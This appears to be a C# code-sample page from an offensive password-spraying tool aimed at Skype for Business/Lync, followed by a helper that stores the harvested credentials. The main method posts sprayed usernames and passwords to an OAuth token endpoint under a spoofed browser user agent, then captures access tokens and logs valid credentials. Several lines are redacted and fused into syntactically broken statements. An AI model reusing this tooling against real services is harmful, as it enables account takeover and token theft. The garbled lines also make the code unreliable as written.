예제 #1
        /// <summary>
        /// Fills in a Skype access token for a credentials record that has a password but no token.
        /// If the record already carries a non-empty Token the method returns true without doing anything;
        /// otherwise it locates a service interface via getOrCreateServiceInterface, requires its SprayURL
        /// to contain "oauthtoken", and posts the record's username/password to that URL as a
        /// grant_type=password form. A matching access_token in the response is copied into the record
        /// and the record's Service is switched to MicrosoftService.Skype.
        /// </summary>
        /// <param name="record">Source of Username/Password; Token and Service are overwritten on success.</param>
        /// <param name="serviceInterfaces">Known interfaces, passed through to getOrCreateServiceInterface.</param>
        /// <param name="UI">Main window used for thread-safe log output.</param>
        /// <param name="enumeratedHostnames">Hostname list, passed through to getOrCreateServiceInterface.</param>
        /// <returns>
        /// true when the record already held a token (early exit). Every other return visible in this listing is
        /// false; several lines are redacted here ("******"), so the success-path return value cannot be seen.
        /// </returns>
        /// <remarks>
        /// NOTE(review): full response bodies and the username are written to the UI log in clear text, and the
        /// redacted log lines append further record fields - treat that log output as sensitive.
        /// NOTE(review): the StreamReader instances created on the response streams are never disposed.
        /// NOTE(review): WebException.Response can be null (e.g. DNS/connect failure); the inner catch turns
        /// the resulting NullReferenceException into a generic "[1]Exception" log line rather than a clear message.
        /// </remarks>
        public static Boolean PreEmptOAuthPostExploit(CredentialsRecord record, List <ServiceInterface> serviceInterfaces, MainWindow UI, ObservableCollection <Hostnames> enumeratedHostnames)
        {
            // Nothing to do when a token is already present.
            if (record.Token != "" && record.Token != null)
            {
                return(true);
            }
            else
            {
                ServiceInterface serviceInterface = getOrCreateServiceInterface(serviceInterfaces, UI, enumeratedHostnames);
                if (serviceInterface != null)
                {
                    //So basically - we need to auth to the REAL SKYPE interface AUTH ENDPOINT - IF it is oauth - and get the token - add it to this record and change the record's service to Skype
                    //THIS IS THEN ONE ALREADY SET UP - REAL LYNC ETC - SO JUST GO - WITH NEW USERNAME LIST


                    //Check it is not an NTLM endpoint or such for Skype
                    if (serviceInterface.host.SprayURL.Url != "" && serviceInterface.host.SprayURL.Url != null)
                    {
                        // Only URLs that look like an OAuth token endpoint are used; anything else is logged and rejected below.
                        if (serviceInterface.host.SprayURL.Url.Contains("oauthtoken"))
                        {
                            //This CAN BE either legacy or modern format - so just go with what we have as known valid
                            //Only causes issue with legacy here if user is invalid = v slow
                            string domainUser = record.Username;
                            UI.ThreadSafeAppendLog("[4]Record username in required format: " + domainUser);

                            // Line partly redacted in this listing: the form body and the request object's
                            // construction/ContentType assignment are collapsed into one statement.
                            string postData = "grant_type=password&username="******"&password="******"application/x-www-form-urlencoded";
                            request.UserAgent   = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0";
                            request.Method      = "POST";
                            var data = Encoding.ASCII.GetBytes(postData);
                            request.ContentLength = data.Length;

                            try
                            {
                                using (var stream = request.GetRequestStream())
                                {
                                    stream.Write(data, 0, data.Length);
                                }
                                // NOTE(review): reader is not disposed; wrap in using.
                                var response       = (HttpWebResponse)request.GetResponse();
                                var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();
                                response.Close();
                                UI.ThreadSafeAppendLog("[4]Response to PreemptPostExploit: " + responseString);

                                if (responseString.Contains("access_token"))
                                {
                                    //Add access token to existing record

                                    Match accessTokenMatch = RegexClass.ReturnMatch(Regexs.cwtToken, responseString);
                                    if (accessTokenMatch.Success)
                                    {
                                        string accessToken = accessTokenMatch.Value;
                                        record.Token   = accessToken;
                                        record.Service = MicrosoftService.Skype;
                                        // Redacted line: the success log, the else-branch ("unable to match") log and its
                                        // return false are fused here; the success-path return is not visible.
                                        UI.ThreadSafeAppendLog("[2]Valid access token added for user: "******"[1]Valid Credentials found for user: "******", but unable to match access token.");
                                        return(false);
                                    }
                                }
                            }
                            catch (WebException webException3)
                            {
                                // A non-2xx status arrives here; the body is still parsed because the endpoint
                                // may return a usable token or a "Bad Request" marker alongside the error status.
                                // NOTE(review): Response is null when no HTTP response was received.
                                HttpWebResponse response = webException3.Response as HttpWebResponse;
                                try
                                {
                                    var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();
                                    UI.ThreadSafeAppendLog("[4]Response to PreemptPostExploit: " + responseString);
                                    if (responseString.Contains("access_token"))
                                    {
                                        Match accessTokenMatch = RegexClass.ReturnMatch(Regexs.cwtToken, responseString);
                                        if (accessTokenMatch.Success)
                                        {
                                            string accessToken = accessTokenMatch.Value;
                                            record.Token   = accessToken;
                                            record.Service = MicrosoftService.Skype;
                                            // Redacted line, same shape as the one in the try block above.
                                            UI.ThreadSafeAppendLog("[2]Valid access token added for user: "******"[1]Valid Credentials found for user: "******", but unable to match access token.");
                                            return(false);
                                        }
                                    }
                                    else if (responseString.Contains("Bad Request"))
                                    {
                                        UI.ThreadSafeAppendLog("[1]Valid credentials found - User not SIP enabled or similar: " + record.Username);
                                        return(false);
                                    }
                                }
                                catch (Exception esdf)
                                {
                                    UI.ThreadSafeAppendLog("[1]Exception: " + esdf.ToString());
                                    return(false);
                                }
                            }
                            catch (Exception ex)
                            {
                                UI.ThreadSafeAppendLog("[1]Exception: " + ex.ToString());
                                return(false);
                            }
                        }
                        else
                        {
                            UI.ThreadSafeAppendLog("[1]Oauth URL not found for Skype host - perhaps the password spray URL is NTLM authentication or other...");
                            return(false);
                        }
                    }
                    else
                    {
                        UI.ThreadSafeAppendLog("[1]No valid authentication URL...");
                        return(false);
                    }
                }
                else
                {
                    UI.ThreadSafeAppendLog("[1]No valid Skype host for authenticaton...");
                    return(false);
                }
            }
            // Reached when a response was read but contained neither a token nor a recognised marker.
            return(false);
        }
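        /// <summary>
        /// Adds <paramref name="record"/> to <paramref name="accessTokens"/>, or - when an entry with the same
        /// Username already exists - merges the record's populated fields into that entry. All collection
        /// access runs on the application dispatcher because the collection is UI-bound. The collection is
        /// persisted via <c>UI.saveValidUsersAndCreds</c> whenever something was added or changed.
        /// </summary>
        /// <param name="record">Record whose non-empty fields are added or merged.</param>
        /// <param name="accessTokens">UI-bound collection of known records; mutated in place.</param>
        /// <param name="UI">Main window used for persistence and for logging failures.</param>
        /// <param name="service">Not used by this method; retained for signature compatibility with callers.</param>
        public static void Add(CredentialsRecord record, ObservableCollection <CredentialsRecord> accessTokens, MainWindow UI, MicrosoftService service)
        {
            try
            {
                App.Current.Dispatcher.Invoke((Action) delegate
                {
                    //Unlock EnumerateUsers for PassSpray - as this is just definitely adding a user
                    MainWindow.SetDoWeHaveEnumeratedUsers(true);
                    if (!string.IsNullOrEmpty(record.Password))
                    {
                        MainWindow.SetDoWeHaveAnyUserAndPass(true);
                    }

                    // One lookup instead of Any() + Where() + First(). Usernames are matched with ordinal
                    // string equality, exactly as the original == comparison did.
                    CredentialsRecord updateMe = accessTokens.FirstOrDefault(x => x.Username == record.Username);
                    if (updateMe == null)
                    {
                        accessTokens.Add(record);
                        UI.saveValidUsersAndCreds(null, SaveType.autoLog);
                        return;
                    }

                    // Existing record: copy over every field the incoming record has populated. Values are
                    // not compared against what is already stored - a populated field always wins.
                    int changed = 0;
                    if (!string.IsNullOrEmpty(record.Password))
                    {
                        //JUST UPDATE PASSWORD - EITHER WILL BE SAME OR WE'VE FOUND IT CHANGED NOW
                        updateMe.Password = record.Password;
                        changed++;
                    }
                    if (!string.IsNullOrEmpty(record.MFA))
                    {
                        updateMe.MFA = record.MFA;
                        changed++;
                    }
                    if (!string.IsNullOrEmpty(record.PasswordExpired))
                    {
                        updateMe.PasswordExpired = record.PasswordExpired;
                        changed++;
                    }
                    if (!string.IsNullOrEmpty(record.ServerError))
                    {
                        updateMe.ServerError = record.ServerError;
                        changed++;
                    }
                    if (!string.IsNullOrEmpty(record.AccountDisabled))
                    {
                        updateMe.AccountDisabled = record.AccountDisabled;
                        changed++;
                    }
                    if (!string.IsNullOrEmpty(record.SipEnabled))
                    {
                        updateMe.SipEnabled = record.SipEnabled;
                        changed++;
                    }
                    //UPDATE RECORD TO BE SERVICE WE LAST HIT - IF WE ENUMMED IN EXCHANGE - THEN SPRAYED IN LYNC AND GOT PASSWORD
                    //IS NOW LYNC
                    if (updateMe.Service != record.Service)
                    {
                        updateMe.Service = record.Service;
                        changed++;
                    }

                    // Fix: previously an empty-string Token (with a non-empty Password) overwrote a token
                    // already stored on the existing record. Require a non-empty Token; the original
                    // Password gate is kept as-is, its purpose is not documented anywhere in this file.
                    if (!string.IsNullOrEmpty(record.Token) && record.Password != "")
                    {
                        updateMe.Token = record.Token;
                        changed++;
                    }

                    if (changed > 0)
                    {
                        UI.saveValidUsersAndCreds(null, SaveType.autoLog);
                    }
                });
            }
            catch (Exception e)
            {
                // Best-effort: a failure here must not take down the caller, but it must not vanish either.
                if (UI != null)
                {
                    UI.ThreadSafeAppendLog("[1]Exception in Add: " + e.ToString());
                }
            }
        }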